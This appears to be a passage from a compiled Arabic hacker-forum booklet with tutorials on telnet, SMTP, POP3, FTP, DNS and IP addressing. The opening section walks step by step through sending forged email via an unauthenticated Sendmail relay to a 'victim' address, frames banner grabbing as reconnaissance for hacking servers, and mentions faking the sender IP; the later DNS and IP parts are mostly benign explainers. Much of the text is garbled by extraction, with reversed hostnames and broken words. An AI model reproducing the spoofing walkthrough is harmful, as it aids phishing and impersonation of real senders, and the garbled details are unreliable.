ال يحتاج لكلمه سر و com.xxxxx.mailgwفان الملقم ..و يالعجب :) لكن الاسم مستخدم

و شبكت مع telnetناه انك اذا دخلت المامعنى ھذا؟؟؟؟معcom.xxxxx.mailgw و استعملت25 على البورت

:) fake email فانه يمكنك ان ترسل رسائل telnetاوامر ال ايه رايك؟؟؟

ممكن تخترق موقع ) ;تعال نشوف ازاي نرسل مثل ھذه الرسايل و كمان بس ال تستعجل >>sendmailيشغل برنامح ال

فانه يمكن ان ترسل ايمیالت من خالل ملقم الرسائل الصادره حیث انه كما قلنا ال يتطلب اي اشتراك

اذن فكل المطلوب ھو االي بي حق السیرفیر او الھوست نیم و اوامر التلنت sendmailالمستخدمه في ال

start====== <run======<telnet====<connect======<remote system

com.xxxxx.mailgw الملقم للرسائل الصادره مثال في الھوست نیم اكتب connect ثم 25و في البورت اكتب

ممكن تالقي حاجه زي كده

131

220 1999 Jul 8 , Thu; .6.88/.3.98com ESMTP Sendmail .xxxxx.alpha0000+:04 :4621) GMT .(

ايش ھذا؟؟؟؟

اصدار ال ھذا ما يسى بالبانار و ھو عاده يحتوي عن بعض المعلومات عنsendmail program الموجود على

البانار ده مھم للھاكر النه عن طريقه بیحدد اي اصدار ...على فكره ...السرفر موجودsendmailمن ال

Sendmailاالصدار في المثال السابق كان ..!!!و ده حیفیده في حاجات كتیره 8.9.3/8.8.6;

: و نشوف helpتعال نكتب االمر 214-.3.98is Sendmail version This 214-Topics: 214 - HELO EHLO MAIL RCPT DATA 214 - RSET NOOP QUIT HELP VRFY 214 - EXPN VERB ETRN DSN 214-For more info use" HELP> topic<." 214-To report bugs in the implementation send email to 214 - org.sendmail@bugs-sendmail. 214-local information send email to Postmaster at your siteFor . 214 End of HELP info

اكتب التالي....سیبك من ده ....ماشي

MAIL FROM :>fake Email address< اكتبه كما ھو باالقواس و بدل .... شمال لترى االمر جیدا ctrl+ shiftالزم تضغط

fake email address org.AoEgH@icerمثال ...اي حاجه...اكتب االيمیل الذي تريده

: حتالقي الرد كده 250 Sender ok... com.AoEgH@icer

اكتب االمر التالي

RCPT TO :>recipient< يجب ان تجصل على رساله تقول ... اكتب ايمیل المرسل الیه recipeintبدل ال

250 Recipient ok... com.victim@victim

132

com.victim@victimلو كان ايمیل المرسل الیه ھو

...بتكرار االمر عده مرات ممكن تبعت الكتر من ايمیل ببساطه ...المھم dataاكتب بعد كده

354 end with, Enter mail "." on a line by itself

اكتب الرساله و لتكن كالتاليfake message: Subject) اكتب اي عنوان انت تريده(

This is a fake Email message. Hello. m bored'I.

Gimme something to hack!!

القي حاجه زي كده الزم ت

250 Message accepted for delivery15313 CAA

message ID ھذا الرقم يسمى 250فیه رقم موجود بجانب ال

:)كده يبقى الرساله اتبعتت و الحمد هللا >>>>روح .....لو انت كنت بعت الرساله الى ايمیل لك ...تعالى نشوف حاجه تانیه headerف ال ھناك و افتح الرساله و شو

:حتالقي الكالم ده .....بتاعھا il .net.netvision.alpha(il .net.netvision.from alpha: Received

by]) .13.1.90194[ with ESMTP id ) .3.98/.3.98(il .net.netvision.cmxfor15313 CAA com.victim@victim ;<0300 +:59 :491999 02Jul 10 , Sat

IDT(( com.AoEgH@icer: From com .crap.hostname.some(com .crap.hostname.from some: Received

133

by]) .225.146.062[ with SMTP id ) .6.88/.3.98(com .xxxxxx.alphaSat; com.victim@for victim15313 CAA ,10 0300 +:46 :551999 02Jul IDT(( IDT(0300 +:46 :551999 02Jul 10 , Sat: Date( ID-Message :>199907092355 .com.xxxxx.alpha@15313CAA<

com .crap.hostname.some: com.xxxxx.alpha: Warning-Authentication-X.225.146.062[ [t use HELO protocol'didn

Fake mail: Subject Status: 8001: Status-Mozilla-X

00000000: 2Status-Mozilla-X ff000002b3da3752: UIDL-X

:تعال نشوف الجزا االول كمثال by ]) .13.1.90194[com .xxxxx.alpha(com .xxxxx.from alpha: Received

com.xxxxx.cmx) 8.9.3/8.9.3 (for16970 with ESMTP id CAA ;< 10 , Sat0000+:59 :491999 02Jul ) GMT (

]) com .xxxxx.alpha]13.1.90194.(اھااااا com.xxxxx.whois alphaكتبنا االمر ده في التیرمینال لو عندنا يونیكس و

>>>>samspadeاو من الويندوز باستخدام االداه server-sub اي انھا عباره عن مايسمى com.xxxxxسنجد انھا تتبع الموقع

..الرسال االيمیالت ............................................................................................

كیف يمكنك ان تخترق موقع به برنامج ال .....الموضوع لم ينتھي بعد sendmail<<<

ان شاء اهللا اترجمه ان كان في العمر بقیه

134

3POPماھو


؟3popما ھو الـ =-=-=-=-=-= -= -=-

Post Office protocol= pop based -webل أي بريد غیر البريد من نوع ال ھو بروتوكول يستخدم الستعما

Email

based Email-web ھو أي بريد ال يمكن استخدامه اال عبر موقع معین حیث سوف

يحتوي ھذا الموقع على العديد من اإلعالنات التي تستفید منھا الشركة المزودة

للبريد ماديا

بر أي أداة للبريدو أي بريد آخر ھو الذي يمكن الدخول الیه و استخدامه ع

:و ھو يستخدم نوعین من البروتوكوالت و ھما

Simple Mail Transfer Protocol= SMTP

Post Office Protocol= POP

كل ما تحتاجه ھو عمیل تلنت و ھو موجود في نظام تشغیل وندوز و كثیرا ما يكون بھذاالشكل popو اآلن سوف نتصل بملقم خدمة

com.xxx.mail com.xxx.wwwذا كان الموقع ھو ا

و ھو المنفذ االفتراضي110سوف نتصل بالملقم عبر المنفذ رقم

135

في نظام وندوز اتبع التاليstart

| run

| 110com .xx.telnet mail: اكتب

بعنوان الموقعxxو بدل

:سوف تفتح نافذة التلنت و عندما يتم االتصال سوف يظھر التالي

server ready.60 7v] .0.5.90318[3 OK POP+

و اآلن سوف نقوم بتعريف أنفسنا للملقم عبر تزويده باسم المستخدم و كلمة

:السر الخاصین ببريدك فنقوم بكتابة األمر التالي لتزويده باسم المستخدم

user username

:سوف يظھر العبارة التالیة

password please, OK User name accepted+ ھنا يطلب منك كلمة السر الخاصة باسم المستخدم الذي أدخلته فنقوم و

بكتابة :األمر التالي لتزويدة بكلمة السر

password-pass your

:اذا كانت المعلومات المعطاه صحیحه سوف يظھر التالي

x messages, OK Mailbox open+

ھو عدد الرسائل الموجودة في البريدxحیث

:انت المعلومات غیر صحیحة أما اذا ك

136

ERR Bad login-

لكي نري قائمة بالرسائل الموجودة و عندھاlistو اآلن نقوم بكتابة األمر

سوف نحصل على سطر واحد فقط يحتوي على رقم الرسالة و على حجمھا

retr xو إذا أردنا قراءة رسالة فنقوم بكتابة األمر نرى الرسالة بكاملھا ھو رقم الرسالة و عندھا سوفxحیث

dele xو اذا أردنا مسح رسالة نقوم بكتابة األمر

ھو رقم الرسالةxحیث

quitو عندما تنتھي و تريد الخروج كل ما علیك فعله ھو أن تكتب األمر

في النھاية يجب أن تعرف أنه عندما تقوم بالدخول الى بريدك يتم انشاء ملفlock fileخرج من البريد و ذلك حتى ال يسمح ألحد بأن و يتم مسحه عندما ت

.يدخل الى البريد و أنت تستخدمه

137

ماھو التلنت

محمد قطان: للكاتب

Telnet الھكرز ( كان ومازال االداة المفضلة لمخترقي المواقع.................... ( كل شي بالتفصیل ؟؟؟؟؟ وما استخداماته ؟؟؟؟؟؟؟؟؟؟ Telnetماھو ال

...............

لإلتصال بأجھزة الكمبیوتر البعیدة IP/TCP بروتوكول من بروتوكوالت Telnetيعتبر كما أنه تطبیق,

لكي يتم Telnet يتم استخدامه في تشغیل برامج IP/TCPمن تطبیقات استخدام جھاز الكمبیوتر بطريقة .فعالة كما لو كنت تجلس أمامه

كیف يتم اإلتصال ؟؟؟؟؟

الجھاز ( الموجود على الوحدة التابعة Telnetتصال باستخدام تطبیق ال يتم اال

Telnetباالتصال بتطبیق ) المتصل Telnet Daemonوعادة ما يكون ) الجھاز الھدف ( الموجود على وحدة الخدمة

.................. ) ل على جھاز الكمبیوتر المحلي المتص( يبدأ االتصال من تطبیق الوحدة التابعة

إلى البروتوكول ====== ثم ينتقل على ) ===== الموجود أيضا على جھاز الكمبیوتر المحلي المتصل (

====== شبكة اإلتصال ثم إلى ) ==== الموجود على جھاز الكمبیوتر البعید ( Telnetإلى بروتوكول

خدمة Telnet ) وھو طبعا الجھاز الھدف ) على جھاز الكمبیوتر البعید..........

ويتم إرسال أية أوامر يقوم المتصل , كبرنامج محاكاة Telnetوھنا يعمل تطبیق بكتابتھا عبر الشبكة لكي

......يتم تنفیذھا من قبل جھاز الكمبیوتر البعید . في انتظار االتصال به 23 يستمع على المنفذ Telnet Daemonعلما أن ال

138

:Telnetخدمات ال ولكنه سیعرض لك , كمتصفح ويب ألي موقع Telnet ال يمكنك استخدام-1

مصدر الصفحة حصرا أي كانت تستخدم عندما كانت Telnetوذلك ألن خدمة ال , للصفحة Sourceال

مواقع االنترنت .......مجرد نصوص

Gute FTP فھو يعمل عمل FTP Client أيضا ك Telnet ويمكن استخدام ال -2

تماما وذلك ........Telnetأوامر يتم إدخالھا من خالل ال باستخدام

وقراءة رسائلك POP Mail أيضا تصفح االيمیل Telnet ويمكنك من خالل ال -3

الواردة وارسال ما تريد POP Mailوھذا طبعا اذا كان االيمیل من نوع , من رسائل

لويب طبعا يختلف عن ايمیل ا ........ Post Office Protocolوھو اختصار ل المستخدم حالیا

......Hotmail و Yahooمثل /com.hotpop.www://http :ومن المواقع التي تقدم مثل ھذه الخدمة مثال

خدمات أخرى ال حاجة لذكرھا ھنا ألن معظمھا أصبح قديما Telnetكما أن ل

وربما عديم الفائدة ...........ا ما نوع

: وضبط إعداداته Telnetتشغیل

.........Telnetثم نكتب ==== Run=== Start من Telnetيمكنك تشغیل

:/// telnetاذھب الى االكسبلورر و اكتب === كما يمكنك تشغیله من متصفح

:ولضبط إعداداته حتى يعمل بشكل صحیح نقوم بالتالي

ثم نقوم Preferences==== ثم اختر منھا === nalTermiإذھب الى القائمة بتفعیل

Block و Local Echo و ANSI/ 100-VTعلى كل من ) وضع عالمة الصح (

139

Cursor ..... جاھز للعمل Telnetواآلن

...........FTP كبروتوكول نقل الملفات Telnetاستخدام ال

اسم Host Nameكتب في ال ثم اRemote System اختر Connectمن القائمة الموقع

:المراد التشبیك علیه مثال ذلك com.Yahoo.FTP

..........21 بورت FTPواكتب كذلك البورت وغالبا ما يستخدم ال و Userعندما يتم نجاح االتصال سیطلب منك ادخال اسم المستخدم

قم بإدخالھما اذا Passالباسوورد اذا كان Anonymouns) المستخدم المجھول ( كنت تعرفھما أو ادخل بواسطة

الموقع يدعم ھذه الخدمة :عندما يطلب منك ادخال اسم المستخدم اكتب ما يلي ..... ومثال ذلك

User Anonymouns اكتب له بريدك ) المستخدم المجھول ( ثم أدخل كلمة السر وفي ھذه الحالة

أو أي بريد إذا لم تشأ بإدخال بريدك : ومثال ھذا الشخصيyour mail@ Pass

بعد ذلك يظھر لك ما يدل على أنه تم االتصال والدخول الى الكمبیوتر الذي :تتصل به وغالبا ما تكون الرسالة كالتالي

230 Logged in anonymously واآلن يجب أن تعمل ما يشبه صیغة اتصال بینك وبین الموقع وذك حتى يتم

..........من خاللھا إرسال واستقبال الملفات وعند ارسالك لھذا االمر سیرد علیك السیرفر , PASVويتم ذلك باستخدام االمر

الذي تتصل به برقم الخاص به و المنفذ المفتوح الذي IPمؤلف من ستة خانات وھي تشمل ال .سوف تستخدمه للشبك على الموقع

:مثال ما يرسله لك السیرفر 227 Entring Passive deMo

208,189,65,69,14,48 ولكن ما تفسیر الستة خانات ھذه ؟؟؟؟؟؟

140

:تفسیر ذلك كالتالي للموقع IPھي رقم االي بي ) من الیسار الى الیمین ( االربع خانات االولى

والذي سوف نشبك بواسطته :وھي.....على الموقع

208,189,65,69

ذي سوف نستخدمه إلنشاء واما الخانتین االخیرتین فھما لحساب رقم البورت ال ,االتصال بالموقع

:وطريقة حسابه كالتالي ثم نجمع إلى حاصل الضرب , 256ب ) 14( نضرب الرقم الذي ھو قبل االخیر

) 48( الرقم االخیر وھو :والعملیة تتم كالتالي , والناتج ھو رقم البورت المطلوب

14 * 256 = 3548+48 = 3632 ..............2363فرقم البورت ھو

:تحلیل العملیة الحسابیة

والجواب أنه عندما يعین سیرفر ) 256( قد تتساءل ھنا لماذا ضربنا الرقم ب

الموقع بورت ما للوصول( للتشبیك من خالله فإنه يرسله لنا بعد أن يحوله الى النظام السداسي عشر

Hex ( فیقوم بعملیة قسمة وناتج القسمة ھو الرقم االول والباقي ) 16 * 16 .... (256رقم البورت على

:ھو الرقم االخیر والمثال كما ترى ( 48والباقي من القسمة ) الرقم االول ( 14 = 256) / رقم البورت ( 3632

) .الرقم االخیر .ھذا كل ما في االمر

بفتح نقوم, والبورت الذي سنشبك من خاللھما IPواآلن بعد أن عرفنا االي بي

نافذة جديدة ونشبك : على الموقع ولیكن مثال

com.Yahoo.FTP 3632ونضع البورت وھو

واآلن أنت في الموقع ويمكنك إدخال البیانات التي تريدھا أو سحب مجلد أو .............ملف

141

صالحیته محدودة في التصفح ) المستخدم الجھول ( ولكن انتبه الى أن ...........

:ألوامر التي تلزمك لعرض وتصفح المجلدات بعض ا

ls لعرض جمیع المجلدات والملفات واالدلة الموجودة في المكان الحالي ..

في الدوس ) dir(يشبه ھذا االمر االمر del لحذف مجلد أو ملف list الستعراض الملفات والمجلدات

syst لمعرفة نوع السیرفر في الموقع aborتقوم بھا اللغاء أي عملیة renfr و rento لنقل مجلد أو ملف من مكان آلخر rest إلكمال عملیة تم إيقافھا help لطلب مساعدة pwd الخبارك ماھو المجلد الي انت متواجد فیه االن . mkd إلنشاء مجلد جديد man وھو اختصار لـ )Manual ( ويتیح لك مشاھدة الخیارات المتاحة لكل امر

ة الخیارات المتاحة مثال لمشاھد man ls نكتب lsلالمر

واآلن سأتكلم عن تصفح االيمیل باستخدام التلنت واوضح لك بعض االمور

...الغامضة عن ھذه االداة

وھذه المواقع قد Telnetھناك الكثیر من المواقع على الشبكة تقدم خدمة نوع محتوياتھا وتت, تعود ملكیتھا الى شركات خاصة او الى جھات حكومیة

:ومجاالت خدماتاھا واذكر من ھذه الخدمات على سبیل المثال Official Data( وقواعد البیانات الرسمیة ) Technical Reports( التقارير الذكیة

Bases ( , وفھارس الكتب ) وكذلك موقع وكالة ) مثل مكتبة الكونغرس االمريكیةNasaن علم الفضاء الذي يحتوي على ابحاث وتقارير ع...

وقد يتطلب استخدامھا اشتراكا , وكذلك ھناك العديد من الخدمات والمواقع وقد توجد مواقع لعامة الزوار ولكن مع بعض التحفظات على مثل , بھذه المواقع

.....ھذا النوع من الولوج واستخدام الموقع تعتبر متممة وأود ان أذكر ھنا اتماما للمقالة السابقة بعض البرامج التي

142

: ومنھا Telnetللحصول على خدمة وھو خاص بنظام ويندوز Ewan برنامج -1 وھو خاص بأنظمة ماكنتوش Ncsa برنامج -2

.وھذان البرنامجان ھما األكثر انتشارا لسھولة التعامل معھما

: في تصفح البريد االلكتروني Telnetاالستفادة من ال

: يعتمد عادة على مزودين Telnetدم خدمة البريد االلكتروني الذي يق 25 ويستخدم البورت SMTP مزود ارسال -1 110 ويستخدم البورت POP مزود استقبال -2

فنفذ الخطوات Telnet عن طريق ال Yahooفإذا أرت ان تتصفح بريدك في :التالیة

: ما يلي Start من Runاكتب في Telnet 110com .Yahoo.Mail.POP ....لى فرض انه لك حساب في الیاھو طبعا ع

بعد ذلك ستظھر لك رسالة ترحیبیة ثم يطلب منك ادخال اسم المستخدم :فاكتب له كما يلي

User ) your name( :بعد ذلك سیطلب منك ادخال كلمة المرور قم بكتابتھا ..... Enterثم اضغط

Pass ) ---( ..... Enterثم اضغط

...ل صحیحا فسوف ينقلك الى صندوق البريد الخاص بك وھنا اذا كان االدخايمكنك استخدام أوامر التلنت لتصفح بريدك وقد ذكرت في المقال السابق

:معظمھا وأذكر منھا 1- List الستعراض الرسائل 2- Dele لحذف احدى الرسائل بعد تعیینھا 3- Retr الستقبال احدى الرسائل بعد تعیینھا 4- Mail Fromبعد كتابة ھذا االمر يظھر ( رسال رسالة وتحديد المرسل لھا ال

......) بعدھا اكتب المرسل الیه Sender ok:لك عبارة5- Rcpt To وبعد كتابة ھذا االمر يظھر لك عبارة ( لتحديد المرسل الیه :

Recipiant ok بعدھا أعطه أمر Data ثم اكتب الرسالة التي تريد .....

:مالحظات وھذا , المعتمد في ارسال الرسائل اليتطلب أي توثیق Smtpلبروتوكول ا-1

143

يعني انه بإمكانك تزيیف الرسائل التي تريد ارسالھا بسھولة وذلك بكتابة أي الخاص وھو أمر IP ويمكنك أيضا تزوير ال Mail Fromبعد أمر ) للمرسل ( اسم

.....في غاية السھولة فإذا كتبت كلمة سر , خاصیة تشفیر البیانات لألسف ال يحتوي Telnet ال -2

وھذه نقطة يجب ان .... مثال فستظھر كما كتبتھا دون أي تورية لھا او تشفیر ...تنتبه لھا

غیر مثبتة Telnet قد تكون خدمة ال 2000 في التثبیت االفتراضي لويندوز -3 ver AdminTelnet Serلذلك فأنت بحاجة لتثبیتھا يدويا وذلك بتثبیت االداة

ولفتح ھذه االداة , والتي تمكنك من ايقاف وتشغیل ھذه الخدمة في جھازك ) ...أدوات إدارية ( Administrative في Telnet Administrationاضغط على

:بعض خیارات ھذه األداة Start the service لتشغیل التلنت .....

Stop the service اليقاف التلنت ...... List the current user يظھر المستخدمین المتصلین بخدمة التلنت ...

وأخیرا اذا كنت قد قرأت ھذين المقالین بشكل متقن فبإمكانك عمل أشیاء السیما في اختراق المواقع ) لمحت الى كثیر منھا ( كثیرة بواسطة ھذه االداة

والبد ... والمتابعة وھذا ال يحتاج منك اال الى التجربة) .... أنواع منھا طبعا .... ( ......أنك في النھاية ستصل الى ما تريد

ولكن انتبه فھذه االمور يجب ان تمارس بعناية فائقة بعد خبرة جیدة حتى .اليسبب لك أي ضرر

144

DNSماھو

ACID EG_BURN: للكاتب

:السالم علیكم و رحمه اهللا و بركاته منى تكونو كلكو بخیر ان شاء اهللا تعالى ايش االخبار يا اصدقاء و زوار المنتدى ات

و طبعا كما وعدتكم بعد العوده الحمد هللا بالمواضیع القويه و المؤثره ان شاء اهللا :و لكن قبل ان نبدأ دعونا نعقد اتفاق معا

فلننسا كلمه ھكر و لنبدأ فى تعلم االشیاء التى توصلنا لكلمه ھكر بمعنى الخ.....تروجن ھورسس او سب سفن الكلمه و طبعا الھكر لیس معنا

الھكر الحقیقى ھو تعلم نظم التشغیل مثل اللینكس و الیونكس و تعلم لغات تصمیم المواقع بجانب بعض لغات البرمجه التى يكون اھمھا فى مجالنا ھى

Cلغه السى :و االن دعونا من كل ھذه الخالبیط و لنبدأ التكلم فى المفید

مع عن اشیاء كثیره و لكن ال نعرف ما ھى و ال نحن فى بعض االحیان نسنحاول ان نكتشف و نعرف ما ھى و فى ھذا الملف سوف نتكلم عن شئ

نسمع عنه كثیرا و لكن معظمنا ال يعرف :ما ھو

:DNSو ھذا الشئ ھو ال و سوف نبدأ بالتحدث عن ھذا االسم الذى يسمعه الكثیرين و لكن ال يعرفون ما

:ھو سؤال نفسه و لنبدأ بال

==================================================

==============

?DNSما ھو ال ==============

DNSو يتصل سرفر ال . Domain Name System ھو اختصار لكلمه DNS: اوال مما يعنى انك اذا اردت االتصال الى احد المواقع و 53عادتا على بورت

قه فسوف تتصل حDNSاستعملت ال

145

translates alphabetical و سوف يترجم او يحول ال 53به عن طريق البورت hostnames و يعنى اسم الموقع مثل :COM.BURN.WWW الى IP ADRESSES و العكس صحیح و عندما تتم العملیه127.0.0.1 مثل

:)تتصل بالموقع مباشره اى تحويل او تحلیل عنوان onaddress resolutiو عملیه التحويل ھذه تسمى

او العكس لنستطیع االتصال به IPالموقع الى و لكن قد .address resolution كان اسم اخر لعملیه ال DNSو قبل ظھور ال

لجعل توزيع الھوستس اسھل بكثیر من الماضى حیث انه من DNSظھر ال عه خانات من السھل ان تتذكر اسم موقع معین تريده افضل من ان تتذكر ارب

) .IP(االرقام كان يتكون من DNS قبل ال address resolutionو كان االسم المستعمل ل ال

و كان عباره عن اسماء الھوستس اى المواقع و HOST FILEملف اسمه ال Stanford Research الخاصه بھم و كان ھذا الملف تتولى رعايته IPعنواوين ال

NIC-SRI(rmation Center s Network Info'Institute .( و كان على ھذاالجدول ھذا حوالى كل اسبوع و يمده بالعنواوين ) UPDATE(الراعى ان يجدد

الجديده و االرقام التى ظھرت و على السیستم ادمین ان يجدد ھو االخر ملفه .NIC-SRI بینه و بین الراعى اى FTPاو عن طريق اتصال ال

لرھیب و السريع بدأ ھذا النظام فى الفشل و بدأو و طبعا مع تطور النترنت ا يبحثون عن النظام االمثل الذى يستطیع التحكم فى الھوست و االى بى

. لیفعل ذلكDNSمعا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظھر ال اى انه لیس ھناك ماكینه او decentralized لیس له مركز اى DNSو ال

عباره عن داتا بیز DNS بل بالعكس فال DNS فى كل ال سیستم معین يتحكم DNSموزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر علیه

.يعرف اين يبحث عندما يريد ان يحصل على معلومه معینه او ھوست معین و كیف كان النظام قبل اكتشافه و DNSھذا بالنسبه لمعلومات عامه عن ال

.امه عن حركه االنترنت القديمه ھى ايضا نظره ع

THE DNS SERVER: ================

او UNIX ھو عباره عن كمبیوتر و يعمل عادتا على نظام DNS SERVERال Berkeley( اى BINDالنظم الشبیھه بالیونكس و يستخدم برنامج الیونكس

Internet Name Domain .(ماكنتوش و يوجد ايضا برامج مثل ھذه للويندوز و ال ايضا

.UNIX و لكن الكل يفضل ال DNS SERVERاذا اراد احد استعمالھم ك

146

: من جزئین DNSو يتكون برنامج ال 53the daemon program that listens to port (the name server itself ( و

RESOLVERاالخر يسمى عینه ھذا يستجیب الى متصفحك عندما تطلب معلومه مNAME SERVERو ال

فمثال عندما تفتح االنترنت اكسبلورر و تكتب او تطلب منه موقه معین مثل COM.BURN.WWW فسیسئل المتصفح اقرب DNS و ھذا يعتمد ( موجود له

ل IPعن عنوان ال ) على اتصالك بالشبكه و رقم االى بى الخاص بكCOM.BURN.WWW

ذا الھوست اى ھذا لیجد السرفر الذى لديه ھIPالن المتصفح يحتاج ھذا ال .الموقع و يطلب محتويات الموقع من السرفر لیعرضھا لك فى متصفحك

فى جداوله اى فى ذاكره متصفحك daemon programو قبل ھذا سیسئل ال عن الموقع الذى تطلبه فأذا لم يجده ينتقل الى ما سبق شرحه و ھكذا تتم

.:)العملیه

THE TREE INFORMATION: ======================

معین من المتصفح IPو االن اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم DNS المحلى اى الخاص بك سوف يسأل ال DNSحقك و ال يجده فى ال

SERVER االعلى منه فى المستوى عنه لیجده و اذا لم يجده فى مستوى ث من االقل اعلى فینتقل للبحث فى مستوى اعلى و اعلى و ھكذا يسیر البح

.DNS SERVERSالى االعلى فى مستويات ال و طبعا نتیجه من ھذا االتصال فنستنتج وجود شجره اتصال و معلومات و لكن

كیف تعمل بالضبط :دعونا نأخذ مثال و ھذا يعتمد على اتصالك uk.co.isp الخاص بك كان مثال ISPلو فرضنا ان ال

لذى تشبك علیه فمن الطبیعى طبعا ان باالنترنت اى حسب الشركه و السرفر ا و االن uk.co.isp.dns مثل ھذا s DNS'ISP s hostname'serverيكون ال

الخاص ب IP لیبحث لك عن DNSفالنفرض انك سألت ھذا ال COM.BURN.WWW مثال فسیقوم ھذا ال uk.co.isp.dns بالبحث فى جداوله

ا لم يجدھا فسینتقل كما قلنا المحلیه المخذنه فى الذاكره عنده فیجدھا و اذ لیبحث فیه و اذا لم يجده ايضا فى DNS SERVERالى مستوى اعلى من ال

المستوى االعلى فعلیه ان يقوم بتغییر مكان البحث كلیا فمثال من uk.co.isp.dns الى uk.org.organization-some او , uk.edu.schooluk.mil.airforce, uk.gov.england, uk.ac.university و الخ و ھناك امثله كثیرا

147

و اذا لم يجده ايضا فى كل االماكن المتاح له UKو كل شئ ينتھى ب :) طبعا موجود على الشبكه و اسمه ال DNSالبحث فیھا فسیرجع المتصفح الى اكبر

ROOT فھو يحتوى على كل عناوين ال IP على كل للمواقع الموجوده على اى DOMAIN NAME.

d why does DNSWhen an" hang "or fail?

============================== الخاص بك يحنوى ISPاذا كان ال . ان يكون بطئ او سريع DNSو يمكن ايضا لل

الذى طلبته فسوف يحتاج فقط الى اجزاء من الثانیه لیأتى به لك و IPعلى ال اعلى من ال اما اذا انتقل المتصفح للبحث فى مستوى. يعرضه فى متصفحك

DNS و فى حاله انه ال . ثانیه 15 فسوف يحتاج الى قلیال من الوقت يمتد حتى و address could not be foundيجده سوف تأتیك رساله من متصفحك تقول

خطأ لیبحث عنه و بالتالى طبعا IP او HOSTھذا يحدث نتیجه اعطاء المتصفح طول البحث فیقوم متصفحك فھو لیس موجود من االساس لیعرضه او نتیجه

.TIMED OUT اى عملیه DNSبقدان االتصال مع ال طبعا حسب RELOAD اوREFRESHو فى ھذه الحاله نضغط فى المتصفح على

.متصفحك

148

IPماھو

محمد القطان:للكاتب

... السالم علیكم

یع نشرھا وذلك في عدة مواضIP/TCPتكلمنا في المنتدى كثیرا حول بروتوكول ... األخ عبد الحفیظ

IPواآلن سوف نشرح مفھوم عناوين الـ

ھذا عبارة عن جزء من بحث كتبته إلحدى المجالت العربیة وسوف نكمل بقیة .. في مواضیع قادمة ان شاء اهللا IP/TCPالكالم عن

تمھید كما يجب.IP يجب أن تحمل رقما منطقیا يعرف باسم عنوان IP/TCPكل محطة

وحیدة لكل محطة أو شبكة مستخدمة لبروتوكول IPأيضا أن تكون عناوين IP/TCPمن أجل االتصال .

مكان توضع المحطة ضمن الشبكة بنفس الطريقة التي يتم IPيعرف عنوان لتحقیق . التعريف بھا عن عنوان منزل داخل مدينة ما باستخدام اسم الشارع

ات الكرة األرضیة عنوانا وحیدا وذو بنیة ذلك، يجب أن تمتلك كل محطة من محط .متماثلة

ورقم المحطة داخل Network ID بالداللة على رقم الشبكة IPيسمح عنوان يدل رقم الشبكة على النظام المتوضع على نفس الشبكة . Host IDالشبكة يجب على جمیع المحطات المتوضعة على شبكة فیزيائیة واحدة أن . الفیزيائیة

كما يجب أن يكون رقم الشبكة وحیدا بین أرقام بقیة . نفس رقم الشبكةتمتلك .الشبكات

أو أي Router فیعرف محطة عمل أو مخدم أو مسیر Host IDأما رقم المحطة يجب أن يكون عنوان كل محطة وحیدا . IP/TCPجھاز يستخدم بروتوكوالت

.بالنسبة للشبكة

رقم الشبكة ورقم المحطة بت ويتألف من أربعة حقول ذات ثمانیة بتات مفصولة 32 على IPان يحوي عنو

، تدعى ھذه 255-0تمثل كل ثمانیة رقما عشريا محصورا بین. بوساطة نقاطيمثل العنوان التالي . dotted decimal notationالبنیة بالتمثیل العشري المنقط

:مثاال على ھذا التمثیل

149

esAddress Classصفوف العناوين . عرفت جماعة اإلنترنت خمسة صفوف للعنونة لتالئم أحجام مختلفة للشبكاتيحدد كل صف البتات المستخدمة لعنونة الشبكة والبتات المستخدمة لعنونة

لذلك يحدد كل صف عدد الشبكات الممكن عنونتھا كما يحدد أيضا . المحطات .عدد المحطات القابلة للعنونة ضمن كل شبكة

A ,ل التالي المعرفات المستخدمة للشبكة وللمحطات ضمن صفوف يبین الجدوand C, B:

Aالصف

إلى الشبكات التي تحتوي على أعدادا كبیرة من Aتنسب عناوين الصف مساويا Aيكون البت ذو الترتیب األعلى من عنوان ما يتبع إلى الصف . المحطات أول بايت كمعرف للشبكة كما تستخدم السبعة بتات التالیة من. إلى الصفر

Network ID . فتستخدم لعنونة المحطات داخل ) بت24(أما البتات الباقیة ملیون 17وحوالي ) 126 إلى 1من ( شبكة 126ھذا يسمح بعنونة . الشبكة

.محطة ضمن كل شبكة

Bالصف

:تقسم البتات كما يلي. إلى الشبكات متوسطة الحجمBتنسب عناوين الصف لتحید نوع الصف10ان ذو الترتیب األعلى يأخذان القیمة البت-1 تستخدم األربعة عشرة بت التالیة كمعرف للشبكة-2 تستخدم الستة عشرة بت األخیرة لعنونة المحطات ضمن كل شبكة-3

. محطة ضمن كل شبكة65.534 شبكة و 16.384ھذا يسمح بعنونة

Cالصف وتوزع البتات كما . LANsلمحلیة الصغیرة إلى الشبكات اCتنسب عناوين الصف

:يلي 110 تأخذ البتات الثالث األول القیمة -1 تستخدم البتات اإلحدى والعشرين التالیة كمعرف للشبكة-2 تستخدم البتات الثمانیة الباقیة لعنونة المحطات ضمن كل شبكة-3

. محطة ضمن كل شبكة254 ملیون شبكة تقريبا و2ھذا يسمح بعنونة

Dالصف يمكن للمجموعة متعددة . للمجموعات متعددة النقاطDتستخدم عناوين الصف

توزع البتات كما . النقاط أن تحوي على محطة أو أكثر أو حتى أن تكون فارغة

150

:يلي 1110 تأخذ البتات األربعة األول القیمة -1كن تستخدم األربعة والعشرين بت الباقیة لعنونة المجموعات والتي يم-2

ال توجد بتات خاصة بالشبكة أو بالمحطة ضمن ھذا . للمستخدم االنضمام إلیھاتمرر الطرود إلى مجموعة جزئیة من المحطات ضمن كل . الصف من العناوين

.فقط المحطات المسجلة ضمن مجموعة متعددة النقاط تستقبل الطرد. شبكة

Eالصف كما . افرة لالستخدام العام كعناوين تجريبیة غیر متوEتستخدم عناوين الصف

.1111تبدأ ھذه العناوين بالقیمة . أنھا محجوزة الستخدامات مستقبلیة

ملخص عن صفوف العناوين نالحظ أن المجموع العام للمحطات القابلة للعنونة ضمن كافة الصفوف السابقة

. محطة3.720.314.628تصل إلى

إرشادات حول العنونة :رشادات التالیة عند نسب معرفات الشبكات والمحطاتيجب االنتباه إلى اإل

تحجز ھذه القیمة إلى وظیفة - 127 ال يمكن لرقم الشبكة أن يأخذ القیمة -1 loopbackالفحص الذاتي لبطاقة الشبكة

تحجز ھذه - ال يمكن لمعرفات الشبكة والمحطة أن تأخذ جمیعا القیمة -2 المحلیة على الشبكةbroadcastالقیمة كتعمیم

